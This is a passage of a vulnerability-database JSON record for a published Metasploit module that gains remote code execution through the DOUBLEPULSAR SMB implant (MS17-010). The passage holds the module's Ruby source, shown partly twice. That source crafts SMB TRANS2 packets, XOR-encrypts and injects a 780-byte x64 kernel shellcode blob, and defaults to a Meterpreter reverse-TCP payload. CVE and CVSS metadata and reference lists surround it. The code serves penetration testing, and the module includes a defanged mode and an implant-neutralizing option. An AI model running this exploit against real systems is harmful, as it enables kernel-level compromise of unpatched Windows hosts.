struct\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS_RES_HDR_PKT.make_struct\r\n pkt.from_s(bytes[4..-1])\r\n\r\n return pkt['SMB'].v['MultiplexID'], pkt['SMB'].v['Signature1'], pkt['SMB'].v['Signature2']\r\n end\r\n\r\n def make_smb_trans2_doublepulsar(opcode, body)\r\n setup_count = 1\r\n setup_data = [0x000e].pack('v')\r\n\r\n param = generate_doublepulsar_param(opcode, body)\r\n data = param + body.to_s\r\n\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS2_PKT.make_struct\r\n simple.client.smb_defaults(pkt['Payload']['SMB'])\r\n\r\n base_offset = pkt.to_s.length + (setup_count * 2) - 4\r\n param_offset = base_offset\r\n data_offset = param_offset + param.length\r\n\r\n pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_TRANSACTION2\r\n pkt['Payload']['SMB'].v['Flags1'] = 0x18\r\n pkt['Payload']['SMB'].v['Flags2'] = 0xc007\r\n\r\n @multiplex_id = rand(0xffff)\r\n\r\n pkt['Payload']['SMB'].v['WordCount'] = 14 + setup_count\r\n pkt['Payload']['SMB'].v['TreeID'] = @tree_id\r\n pkt['Payload']['SMB'].v['MultiplexID'] = @multiplex_id\r\n\r\n pkt['Payload'].v['ParamCountTotal'] = param.length\r\n pkt['Payload'].v['DataCountTotal'] = body.to_s.length\r\n pkt['Payload'].v['ParamCountMax'] = 1\r\n pkt['Payload'].v['DataCountMax'] = 0\r\n pkt['Payload'].v['ParamCount'] = param.length\r\n pkt['Payload'].v['ParamOffset'] = param_offset\r\n pkt['Payload'].v['DataCount'] = body.to_s.length\r\n pkt['Payload'].v['DataOffset'] = data_offset\r\n pkt['Payload'].v['SetupCount'] = setup_count\r\n pkt['Payload'].v['SetupData'] = setup_data\r\n pkt['Payload'].v['Timeout'] = generate_doublepulsar_timeout(opcode)\r\n pkt['Payload'].v['Payload'] = data\r\n\r\n pkt.to_s\r\n end\r\n\r\n # ring3 = user mode encoded payload\r\n # proc_name = process to inject APC into\r\n def make_kernel_user_payload(ring3, proc_name)\r\n sc = make_kernel_shellcode(proc_name)\r\n\r\n sc << [ring3.length].pack('S<')\r\n sc << ring3\r\n\r\n sc\r\n end\r\n\r\n def generate_process_hash(process)\r\n # x64_calc_hash from external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n proc_hash = 0\r\n process << \"\\x00\"\r\n\r\n process.each_byte do |c|\r\n proc_hash = ror(proc_hash, 13)\r\n proc_hash += c\r\n end\r\n\r\n [proc_hash].pack('l<')\r\n end\r\n\r\n def ror(dword, bits)\r\n (dword >> bits | dword << (32 - bits)) & 0xFFFFFFFF\r\n end\r\n\r\n def make_kernel_shellcode(proc_name)\r\n # see: external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n # Length: 780 bytes\r\n \"\\x31\\xc9\\x41\\xe2\\x01\\xc3\\x56\\x41\\x57\\x41\\x56\\x41\\x55\\x41\\x54\\x53\" \\\r\n \"\\x55\\x48\\x89\\xe5\\x66\\x83\\xe4\\xf0\\x48\\x83\\xec\\x20\\x4c\\x8d\\x35\\xe3\" \\\r\n \"\\xff\\xff\\xff\\x65\\x4c\\x8b\\x3c\\x25\\x38\\x00\\x00\\x00\\x4d\\x8b\\x7f\\x04\" \\\r\n \"\\x49\\xc1\\xef\\x0c\\x49\\xc1\\xe7\\x0c\\x49\\x81\\xef\\x00\\x10\\x00\\x00\\x49\" \\\r\n \"\\x8b\\x37\\x66\\x81\\xfe\\x4d\\x5a\\x75\\xef\\x41\\xbb\\x5c\\x72\\x11\\x62\\xe8\" \\\r\n \"\\x18\\x02\\x00\\x00\\x48\\x89\\xc6\\x48\\x81\\xc6\\x08\\x03\\x00\\x00\\x41\\xbb\" \\\r\n \"\\x7a\\xba\\xa3\\x30\\xe8\\x03\\x02\\x00\\x00\\x48\\x89\\xf1\\x48\\x39\\xf0\\x77\" \\\r\n \"\\x11\\x48\\x8d\\x90\\x00\\x05\\x00\\x00\\x48\\x39\\xf2\\x72\\x05\\x48\\x29\\xc6\" \\\r\n \"\\xeb\\x08\\x48\\x8b\\x36\\x48\\x39\\xce\\x75\\xe2\\x49\\x89\\xf4\\x31\\xdb\\x89\" \\\r\n \"\\xd9\\x83\\xc1\\x04\\x81\\xf9\\x00\\x00\\x01\\x00\\x0f\\x8d\\x66\\x01\\x00\\x00\" \\\r\n \"\\x4c\\x89\\xf2\\x89\\xcb\\x41\\xbb\\x66\\x55\\xa2\\x4b\\xe8\\xbc\\x01\\x00\\x00\" \\\r\n \"\\x85\\xc0\\x75\\xdb\\x49\\x8b\\x0e\\x41\\xbb\\xa3\\x6f\\x72\\x2d\\xe8\\xaa\\x01\" \\\r\n \"\\x00\\x00\\x48\\x89\\xc6\\xe8\\x50\\x01\\x00\\x00\\x41\\x81\\xf9\" +\r\n generate_process_hash(proc_name.upcase) +\r\n \"\\x75\\xbc\\x49\\x8b\\x1e\\x4d\\x8d\\x6e\\x10\\x4c\\x89\\xea\\x48\\x89\\xd9\" \\\r\n \"\\x41\\xbb\\xe5\\x24\\x11\\xdc\\xe8\\x81\\x01\\x00\\x00\\x6a\\x40\\x68\\x00\\x10\" \\\r\n \"\\x00\\x00\\x4d\\x8d\\x4e\\x08\\x49\\xc7\\x01\\x00\\x10\\x00\\x00\\x4d\\x31\\xc0\" \\\r\n \"\\x4c\\x89\\xf2\\x31\\xc9\\x48\\x89\\x0a\\x48\\xf7\\xd1\\x41\\xbb\\x4b\\xca\\x0a\" \\\r\n \"\\xee\\x48\\x83\\xec\\x20\\xe8\\x52\\x01\\x00\\x00\\x85\\xc0\\x0f\\x85\\xc8\\x00\" \\\r\n \"\\x00\\x00\\x49\\x8b\\x3e\\x48\\x8d\\x35\\xe9\\x00\\x00\\x00\\x31\\xc9\\x66\\x03\" \\\r\n \"\\x0d\\xd7\\x01\\x00\\x00\\x66\\x81\\xc1\\xf9\\x00\\xf3\\xa4\\x48\\x89\\xde\\x48\" \\\r\n \"\\x81\\xc6\\x08\\x03\\x00\\x00\\x48\\x89\\xf1\\x48\\x8b\\x11\\x4c\\x29\\xe2\\x51\" \\\r\n \"\\x52\\x48\\x89\\xd1\\x48\\x83\\xec\\x20\\x41\\xbb\\x26\\x40\\x36\\x9d\\xe8\\x09\" \\\r\n \"\\x01\\x00\\x00\\x48\\x83\\xc4\\x20\\x5a\\x59\\x48\\x85\\xc0\\x74\\x18\\x48\\x8b\" \\\r\n \"\\x80\\xc8\\x02\\x00\\x00\\x48\\x85\\xc0\\x74\\x0c\\x48\\x83\\xc2\\x4c\\x8b\\x02\" \\\r\n \"\\x0f\\xba\\xe0\\x05\\x72\\x05\\x48\\x8b\\x09\\xeb\\xbe\\x48\\x83\\xea\\x4c\\x49\" \\\r\n \"\\x89\\xd4\\x31\\xd2\\x80\\xc2\\x90\\x31\\xc9\\x41\\xbb\\x26\\xac\\x50\\x91\\xe8\" \\\r\n \"\\xc8\\x00\\x00\\x00\\x48\\x89\\xc1\\x4c\\x8d\\x89\\x80\\x00\\x00\\x00\\x41\\xc6\" \\\r\n \"\\x01\\xc3\\x4c\\x89\\xe2\\x49\\x89\\xc4\\x4d\\x31\\xc0\\x41\\x50\\x6a\\x01\\x49\" \\\r\n \"\\x8b\\x06\\x50\\x41\\x50\\x48\\x83\\xec\\x20\\x41\\xbb\\xac\\xce\\x55\\x4b\\xe8\" \\\r\n \"\\x98\\x00\\x00\\x00\\x31\\xd2\\x52\\x52\\x41\\x58\\x41\\x59\\x4c\\x89\\xe1\\x41\" \\\r\n \"\\xbb\\x18\\x38\\x09\\x9e\\xe8\\x82\\x00\\x00\\x00\\x4c\\x89\\xe9\\x41\\xbb\\x22\" \\\r\n \"\\xb7\\xb3\\x7d\\xe8\\x74\\x00\\x00\\x00\\x48\\x89\\xd9\\x41\\xbb\\x0d\\xe2\\x4d\" \\\r\n \"\\x85\\xe8\\x66\\x00\\x00\\x00\\x48\\x89\\xec\\x5d\\x5b\\x41\\x5c\\x41\\x5d\\x41\" \\\r\n \"\\x5e\\x41\\x5f\\x5e\\xc3\\xe9\\xb5\\x00\\x00\\x00\\x4d\\x31\\xc9\\x31\\xc0\\xac\" \\\r\n \"\\x41\\xc1\\xc9\\x0d\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\x01\\xc1\\x38\\xe0\\x75\" \\\r\n \"\\xec\\xc3\\x31\\xd2\\x65\\x48\\x8b\\x52\\x60\\x48\\x8b\\x52\\x18\\x48\\x8b\\x52\" \\\r\n \"\\x20\\x48\\x8b\\x12\\x48\\x8b\\x72\\x50\\x48\\x0f\\xb7\\x4a\\x4a\\x45\\x31\\xc9\" \\\r\n \"\\x31\\xc0\\xac\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\xc1\\xc9\\x0d\\x41\\x01\\xc1\" \\\r\n \"\\xe2\\xee\\x45\\x39\\xd9\\x75\\xda\\x4c\\x8b\\x7a\\x20\\xc3\\x4c\\x89\\xf8\\x41\" \\\r\n \"\\x51\\x41\\x50\\x52\\x51\\x56\\x48\\x89\\xc2\\x8b\\x42\\x3c\\x48\\x01\\xd0\\x8b\" \\\r\n \"\\x80\\x88\\x00\\x00\\x00\\x48\\x01\\xd0\\x50\\x8b\\x48\\x18\\x44\\x8b\\x40\\x20\" \\\r\n \"\\x49\\x01\\xd0\\x48\\xff\\xc9\\x41\\x8b\\x34\\x88\\x48\\x01\\xd6\\xe8\\x78\\xff\" \\\r\n \"\\xff\\xff\\x45\\x39\\xd9\\x75\\xec\\x58\\x44\\x8b\\x40\\x24\\x49\\x01\\xd0\\x66\" \\\r\n \"\\x41\\x8b\\x0c\\x48\\x44\\x8b\\x40\\x1c\\x49\\x01\\xd0\\x41\\x8b\\x04\\x88\\x48\" \\\r\n \"\\x01\\xd0\\x5e\\x59\\x5a\\x41\\x58\\x41\\x59\\x41\\x5b\\x41\\x53\\xff\\xe0\\x56\" \\\r\n \"\\x41\\x57\\x55\\x48\\x89\\xe5\\x48\\x83\\xec\\x20\\x41\\xbb\\xda\\x16\\xaf\\x92\" \\\r\n \"\\xe8\\x4d\\xff\\xff\\xff\\x31\\xc9\\x51\\x51\\x51\\x51\\x41\\x59\\x4c\\x8d\\x05\" \\\r\n \"\\x1a\\x00\\x00\\x00\\x5a\\x48\\x83\\xec\\x20\\x41\\xbb\\x46\\x45\\x1b\\x22\\xe8\" \\\r\n \"\\x68\\xff\\xff\\xff\\x48\\x89\\xec\\x5d\\x41\\x5f\\x5e\\xc3\"\r\n end\r\n\r\n def kernel_shellcode_size\r\n make_kernel_shellcode('').length\r\n end\r\n\r\nend\n\n# 0day.today [2020-02-04] #"}, "lastseen": "2020-02-05T00:47:44", "differentElements": ["cvss2", "cvss3", "reporter", "sourceData", "title"], "edition": 1}, {"bulletin": {"id": "1337DAY-ID-33895", "vendorId": null, "hash": "a29471c4b5bc1cd538a51cd3a4b54098", "type": "zdt", "bulletinFamily": "exploit", "title": "SMB DOUBLEPULSAR Remote Code Execution Exploit\n", "description": "This Metasploit module executes a Metasploit payload against the Equation Group's DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE. While this module primarily performs code execution against the implant, the \"Neutralize implant\" target allows you to disable the implant.", "published": "2020-02-04T00:00:00", "modified": "2020-02-04T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://0day.today/exploit/description/33895", "reporter": "zdt", "references": [], "cvelist": ["CVE-2017-0146", "CVE-2017-0145", "CVE-2017-0147", "CVE-2017-0148", "CVE-2017-0144", "CVE-2017-0143"], "immutableFields": [], "lastseen": "2021-09-01T13:26:14", "history": [], "viewCount": 110, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"]}, {"type": "exploitdb", "idList": ["EDB-ID:47456", "EDB-ID:41891", "EDB-ID:41987", "EDB-ID:43970", "EDB-ID:42031"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:154690", "PACKETSTORM:156196", "PACKETSTORM:142181", "PACKETSTORM:142548", "PACKETSTORM:146236"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810", "OPENVAS:1361412562310810698"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607"]}, {"type": "zdt", "idList": ["1337DAY-ID-27786", "1337DAY-ID-33313", "1337DAY-ID-27613", "1337DAY-ID-27803", "1337DAY-ID-27802", "1337DAY-ID-29702", "1337DAY-ID-27752"]}, {"type": "kaspersky", "idList": ["KLA10977"]}, {"type": "nessus", "idList": ["MS17-010.NASL", "SMB_NT_MS17-010.NASL", "SMB_DOUBLE_PULSAR_BACKDOOR_DETECT.NBIN", "700099.PRM", "700059.PRM"]}, {"type": "mskb", "idList": ["KB4012598", "KB4013389"]}, {"type": "seebug", "idList": ["SSV:92952", "SSV:92964"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "cve", "idList": ["CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0148", "CVE-2017-0145", "CVE-2017-0144", "CVE-2017-0143"]}, {"type": "symantec", "idList": ["SMNTC-96709", "SMNTC-96705", "SMNTC-96707", "SMNTC-96704", "SMNTC-96706", "SMNTC-96703"]}, {"type": "kitploit", "idList": ["KITPLOIT:9146046356497464176"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104"]}, {"type": "threatpost", "idList": ["THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7"]}, {"type": "mmpc", "idList": ["MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:89789F73D15A0B331512F90F7E692851"]}, {"type": "canvas", "idList": ["MS17_010", "ETERNALBLUE"]}, {"type": "thn", "idList": ["THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:18A54BDD63D7DC2B3284D326E6510150", "THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:FF56343C15BACA1C1CE83A105EFD7F77"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0148", "MS:CVE-2017-0144", "MS:CVE-2017-0145", "MS:CVE-2017-0143"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "saint", "idList": ["SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:9EF85E0CE1D118D27911357B1C516074", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "avleonov", "idList": ["AVLEONOV:A5219F45CF78A7D911A6EBBE8F9D49B2"]}], "modified": "2020-02-05T00:47:44", "rev": 2}, "score": {"value": 7.5, "vector": "NONE", "modified": "2020-02-05T00:47:44", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/33895", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n\r\n Rank = GreatRanking\r\n\r\n include Msf::Exploit::Remote::SMB::Client\r\n include Msf::Module::Deprecated\r\n\r\n moved_from 'exploit/windows/smb/doublepulsar_rce'\r\n\r\n MAX_SHELLCODE_SIZE = 4096\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'SMB DOUBLEPULSAR Remote Code Execution',\r\n 'Description' => %q{\r\n This module executes a Metasploit payload against the Equation Group's\r\n DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE.\r\n\r\n While this module primarily performs code execution against the implant,\r\n the \"Neutralize implant\" target allows you to disable the implant.\r\n },\r\n 'Author' => [\r\n 'Equation Group', # DOUBLEPULSAR implant\r\n 'Shadow Brokers', # Equation Group dump\r\n 'zerosum0x0', # DOPU analysis and detection\r\n 'Luke Jennings', # DOPU analysis and detection\r\n 'wvu', # Metasploit module and arch detection\r\n 'Jacob Robles' # Metasploit module and RCE help\r\n ],\r\n 'References' => [\r\n ['MSB', 'MS17-010'],\r\n ['CVE', '2017-0143'],\r\n ['CVE', '2017-0144'],\r\n ['CVE', '2017-0145'],\r\n ['CVE', '2017-0146'],\r\n ['CVE', '2017-0147'],\r\n ['CVE', '2017-0148'],\r\n ['URL', 'https://zerosum0x0.blogspot.com/2017/04/doublepulsar-initial-smb-backdoor-ring.html'],\r\n ['URL', 'https://countercept.com/blog/analyzing-the-doublepulsar-kernel-dll-injection-technique/'],\r\n ['URL', 'https://www.countercept.com/blog/doublepulsar-usermode-analysis-generic-reflective-dll-loader/'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-detection-script'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-c2-traffic-decryptor'],\r\n ['URL', 'https://gist.github.com/msuiche/50a36710ee59709d8c76fa50fc987be1']\r\n ],\r\n 'DisclosureDate' => '2017-04-14', # Shadow Brokers leak\r\n 'License' => MSF_LICENSE,\r\n 'Platform' => 'win',\r\n 'Arch' => ARCH_X64,\r\n 'Privileged' => true,\r\n 'Payload' => {\r\n 'Space' => MAX_SHELLCODE_SIZE - kernel_shellcode_size,\r\n 'DisableNops' => true\r\n },\r\n 'Targets' => [\r\n ['Execute payload (x64)',\r\n 'DefaultOptions' => {\r\n 'EXITFUNC' => 'thread',\r\n 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'\r\n }\r\n ],\r\n ['Neutralize implant',\r\n 'DefaultOptions' => {\r\n 'PAYLOAD' => nil # XXX: \"Unset\" generic payload\r\n }\r\n ]\r\n ],\r\n 'DefaultTarget' => 0,\r\n 'Notes' => {\r\n 'AKA' => ['DOUBLEPULSAR'],\r\n 'RelatedModules' => [\r\n 'auxiliary/scanner/smb/smb_ms17_010',\r\n 'exploit/windows/smb/ms17_010_eternalblue'\r\n ],\r\n 'Stability' => [CRASH_OS_DOWN],\r\n 'Reliability' => [REPEATABLE_SESSION]\r\n }\r\n ))\r\n\r\n register_advanced_options([\r\n OptBool.new('DefangedMode', [true, 'Run in defanged mode', true]),\r\n OptString.new('ProcessName', [true, 'Process to inject payload into', 'spoolsv.exe'])\r\n ])\r\n end\r\n\r\n OPCODES = {\r\n ping: 0x23,\r\n exec: 0xc8,\r\n kill: 0x77\r\n }.freeze\r\n\r\n STATUS_CODES = {\r\n not_detected: 0x00,\r\n success: 0x10,\r\n invalid_params: 0x20,\r\n alloc_failure: 0x30\r\n }.freeze\r\n\r\n def calculate_doublepulsar_status(m1, m2)\r\n STATUS_CODES.key(m2.to_i - m1.to_i)\r\n end\r\n\r\n # algorithm to calculate the XOR Key for DoublePulsar knocks\r\n def calculate_doublepulsar_xor_key(s)\r\n x = (2 * s ^ (((s & 0xff00 | (s << 16)) << 8) | (((s >> 16) | s & 0xff0000) >> 8)))\r\n x & 0xffffffff # this line was added just to truncate to 32 bits\r\n end\r\n\r\n # The arch is adjacent to the XOR key in the SMB signature\r\n def calculate_doublepulsar_arch(s)\r\n s == 0 ? ARCH_X86 : ARCH_X64\r\n end\r\n\r\n def generate_doublepulsar_timeout(op)\r\n k = SecureRandom.random_bytes(4).unpack1('V')\r\n 0xff & (op - ((k & 0xffff00) >> 16) - (0xffff & (k & 0xff00) >> 8)) | k & 0xffff00\r\n end\r\n\r\n def generate_doublepulsar_param(op, body)\r\n case OPCODES.key(op)\r\n when :ping, :kill\r\n \"\\x00\" * 12\r\n when :exec\r\n Rex::Text.xor([@xor_key].pack('V'), [body.length, body.length, 0].pack('V*'))\r\n end\r\n end\r\n\r\n def check\r\n ipc_share = \"\\\\\\\\#{rhost}\\\\IPC$\"\r\n\r\n @tree_id = do_smb_setup_tree(ipc_share)\r\n vprint_good(\"Connected to #{ipc_share} with TID = #{@tree_id}\")\r\n vprint_status(\"Target OS is #{smb_peer_os}\")\r\n\r\n print_status('Sending ping to DOUBLEPULSAR')\r\n code, signature1, signature2 = do_smb_doublepulsar_pkt\r\n msg = 'Host is likely INFECTED with DoublePulsar!'\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n @xor_key = calculate_doublepulsar_xor_key(signature1)\r\n @arch = calculate_doublepulsar_arch(signature2)\r\n\r\n arch_str =\r\n case @arch\r\n when ARCH_X86\r\n 'x86 (32-bit)'\r\n when ARCH_X64\r\n 'x64 (64-bit)'\r\n end\r\n\r\n print_warning(\"#{msg} - Arch: #{arch_str}, XOR Key: 0x#{@xor_key.to_s(16).upcase}\")\r\n CheckCode::Vulnerable\r\n when :not_detected\r\n print_error('DOUBLEPULSAR not detected or disabled')\r\n CheckCode::Safe\r\n else\r\n print_error('An unknown error occurred')\r\n CheckCode::Unknown\r\n end\r\n end\r\n\r\n def exploit\r\n if datastore['DefangedMode']\r\n warning = <<~EOF\r\n\r\n\r\n Are you SURE you want to execute code against a nation-state implant?\r\n You MAY contaminate forensic evidence if there is an investigation.\r\n\r\n Disable the DefangedMode option if you have authorization to proceed.\r\n EOF\r\n\r\n fail_with(Failure::BadConfig, warning)\r\n end\r\n\r\n # No ForceExploit because @tree_id and @xor_key are required\r\n unless check == CheckCode::Vulnerable\r\n fail_with(Failure::NotVulnerable, 'Unable to proceed without DOUBLEPULSAR')\r\n end\r\n\r\n case target.name\r\n when 'Execute payload (x64)'\r\n unless @xor_key\r\n fail_with(Failure::NotFound, 'XOR key not found')\r\n end\r\n\r\n if @arch == ARCH_X86\r\n fail_with(Failure::NoTarget, 'x86 is not a supported target')\r\n end\r\n\r\n print_status(\"Generating kernel shellcode with #{datastore['PAYLOAD']}\")\r\n shellcode = make_kernel_user_payload(payload.encoded, datastore['ProcessName'])\r\n shellcode << rand_text(MAX_SHELLCODE_SIZE - shellcode.length)\r\n vprint_status(\"Total shellcode length: #{shellcode.length} bytes\")\r\n\r\n print_status(\"Encrypting shellcode with XOR key 0x#{@xor_key.to_s(16).upcase}\")\r\n xor_shellcode = Rex::Text.xor([@xor_key].pack('V'), shellcode)\r\n\r\n print_status('Sending shellcode to DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:exec], xor_shellcode)\r\n when 'Neutralize implant'\r\n return neutralize_implant\r\n end\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Payload execution successful')\r\n when :invalid_params\r\n fail_with(Failure::BadConfig, 'Invalid parameters were specified')\r\n when :alloc_failure\r\n fail_with(Failure::PayloadFailed, 'An allocation failure occurred')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n ensure\r\n disconnect\r\n end\r\n\r\n def neutralize_implant\r\n print_status('Neutralizing DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:kill])\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Implant neutralization successful')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n end\r\n\r\n def do_smb_setup_tree(ipc_share)\r\n connect\r\n\r\n # logon as user \\\r\n simple.login(datastore['SMBName'], datastore['SMBUser'], datastore['SMBPass'], datastore['SMBDomain'])\r\n\r\n # connect to IPC$\r\n simple.connect(ipc_share)\r\n\r\n # return tree\r\n simple.shares[ipc_share]\r\n end\r\n\r\n def do_smb_doublepulsar_pkt(opcode = OPCODES[:ping], body = nil)\r\n # make doublepulsar knock\r\n pkt = make_smb_trans2_doublepulsar(opcode, body)\r\n\r\n sock.put(pkt)\r\n bytes = sock.get_once\r\n\r\n return unless bytes\r\n\r\n # convert packet to response struct\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS_RES_HDR_PKT.make_struct\r\n pkt.from_s(bytes[4..-1])\r\n\r\n return pkt['SMB'].v['MultiplexID'], pkt['SMB'].v['Signature1'], pkt['SMB'].v['Signature2']\r\n end\r\n\r\n def make_smb_trans2_doublepulsar(opcode, body)\r\n setup_count = 1\r\n setup_data = [0x000e].pack('v')\r\n\r\n param = generate_doublepulsar_param(opcode, body)\r\n data = param + body.to_s\r\n\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS2_PKT.make_struct\r\n simple.client.smb_defaults(pkt['Payload']['SMB'])\r\n\r\n base_offset = pkt.to_s.length + (setup_count * 2) - 4\r\n param_offset = base_offset\r\n data_offset = param_offset + param.length\r\n\r\n pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_TRANSACTION2\r\n pkt['Payload']['SMB'].v['Flags1'] = 0x18\r\n pkt['Payload']['SMB'].v['Flags2'] = 0xc007\r\n\r\n @multiplex_id = rand(0xffff)\r\n\r\n pkt['Payload']['SMB'].v['WordCount'] = 14 + setup_count\r\n pkt['Payload']['SMB'].v['TreeID'] = @tree_id\r\n pkt['Payload']['SMB'].v['MultiplexID'] = @multiplex_id\r\n\r\n pkt['Payload'].v['ParamCountTotal'] = param.length\r\n pkt['Payload'].v['DataCountTotal'] = body.to_s.length\r\n pkt['Payload'].v['ParamCountMax'] = 1\r\n pkt['Payload'].v['DataCountMax'] = 0\r\n pkt['Payload'].v['ParamCount'] = param.length\r\n pkt['Payload'].v['ParamOffset'] = param_offset\r\n pkt['Payload'].v['DataCount'] = body.to_s.length\r\n pkt['Payload'].v['DataOffset'] = data_offset\r\n pkt['Payload'].v['SetupCount'] = setup_count\r\n pkt['Payload'].v['SetupData'] = setup_data\r\n pkt['Payload'].v['Timeout'] = generate_doublepulsar_timeout(opcode)\r\n pkt['Payload'].v['Payload'] = data\r\n\r\n pkt.to_s\r\n end\r\n\r\n # ring3 = user mode encoded payload\r\n # proc_name = process to inject APC into\r\n def make_kernel_user_payload(ring3, proc_name)\r\n sc = make_kernel_shellcode(proc_name)\r\n\r\n sc << [ring3.length].pack('S<')\r\n sc << ring3\r\n\r\n sc\r\n end\r\n\r\n def generate_process_hash(process)\r\n # x64_calc_hash from external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n proc_hash = 0\r\n process << \"\\x00\"\r\n\r\n process.each_byte do |c|\r\n proc_hash = ror(proc_hash, 13)\r\n proc_hash += c\r\n end\r\n\r\n [proc_hash].pack('l<')\r\n end\r\n\r\n def ror(dword, bits)\r\n (dword >> bits | dword << (32 - bits)) & 0xFFFFFFFF\r\n end\r\n\r\n def 